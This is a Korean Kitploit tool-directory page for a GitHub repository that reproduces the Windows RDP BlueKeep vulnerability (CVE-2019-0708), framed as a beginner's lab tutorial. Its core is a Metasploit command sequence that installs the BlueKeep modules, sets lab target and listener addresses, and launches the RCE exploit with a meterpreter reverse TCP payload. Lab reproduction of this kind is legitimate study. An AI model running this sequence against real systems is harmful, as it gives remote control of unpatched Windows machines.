Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-0708-Windows — 이 글에서는 Windows 원격 데스크톱 서비스 취약점(CVE-2019-0708)을 공유하고, 해당 취약점 및 방어 조치에 대해 자세히 설명합니다. 저는 사이버 보안 초보자로서, 여러분께 기본 자습서를 공유합니다. 주로 보안 도구와 실습에 관한 온라인 노트이며, 마음에 드셨으면 좋겠습니다. 또한, 함께 실습하며 발전해 나가길 바라며, 앞으로 네트워크 보안 및 시스템 보안 지식을 깊이 학습하고 관련 실험을 공유하겠습니다. 이 시리즈의 글이 블로거 친구들에게 도움이 되길 바라며, 글쓰기가 쉽지 않으니 고수님들은 불쾌하지 않게 봐주시길 부탁드립니다. 감사합니다! | Kitploit
도구/GitHubGitHub/eastmountyxz/cve-2019-0708-windows
Vulnerability AnalysisExploitationPenetration TestingLearning & EducationPayload DevelopmentLabs & Practice
GitHubeastmountyxz/cve-2019-0708-windows

CVE-2019-0708-Windows

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
52106년 전아직 검토되지 않음

소개

이 글에서는 Windows 원격 데스크톱 서비스 취약점(CVE-2019-0708)을 공유하고, 해당 취약점 및 방어 조치에 대해 자세히 설명합니다. 저는 사이버 보안 초보자로서, 여러분께 기본 자습서를 공유합니다. 주로 보안 도구와 실습에 관한 온라인 노트이며, 마음에 드셨으면 좋겠습니다. 또한, 함께 실습하며 발전해 나가길 바라며, 앞으로 네트워크 보안 및 시스템 보안 지식을 깊이 학습하고 관련 실험을 공유하겠습니다. 이 시리즈의 글이 블로거 친구들에게 도움이 되길 바라며, 글쓰기가 쉽지 않으니 고수님들은 불쾌하지 않게 봐주시길 부탁드립니다. 감사합니다!

공유

CVE-2019-0708-Windows

이 글은 Windows 원격 데스크톱 서비스 취약점(CVE-2019-0708)을 공유하고, 해당 취약점 및 방어 조치에 대해 자세히 설명합니다. 저자는 네트워크 보안 초보자로서, 주로 보안 도구와 실습 작업에 관한 온라인 노트를 기반으로 한 자습서를 공유하고 있습니다. 마음에 드셨으면 좋겠습니다. 또한, 여러분이 저와 함께 작업하고 발전해 나가길 바라며, 앞으로 네트워크 보안 및 시스템 보안 지식을 더 깊이 배우고 관련 실험을 공유할 예정입니다. 요컨대, 이 시리즈의 글이 블로그 친구들에게 도움이 되길 바랍니다. 글 쓰기는 쉽지 않으니, 고수분들은 좋지 않다고 해도 비난하지 말아 주세요. 감사합니다!


해당 블로그:
[网络安全自学篇] 五十八.Windows漏洞利用之再看CVE-2019-0708及Metasploit反弹shell
[网络安全自学篇] 四十四.Windows远程桌面服务漏洞(CVE-2019-0708)复现及详解


핵심 명령어:

root@kitploit:~
# 复制文件
cp ./rdp/rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/
cp ./rdp/rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/
cp ./rdp/cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/

# 开启工具
msfconsole
reload_all
search 0708

# 使用脚本
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

# 查看信息
show options
show targets
info

# 设置监听地址、目标地址、反弹payload、目标类型
set rhosts 192.168.44.132
set lhost 192.168.44.129
set rdp_client_ip 192.168.44.129
set payload windows/x64/meterpreter/reverse_tcp
unset RDP_CLIENT_NAME
set target 3

# 运行脚本
run
exploit

# 设置带宽
Set GROOMSIZE 40

참고 문헌:
[1] https://github.com/rapid7/metasploit-framework/pull/12283?from=groupmessage&isappinstalled=0
[2] https://github.com/n1xbyte/CVE-2019-0708

도구 다운로드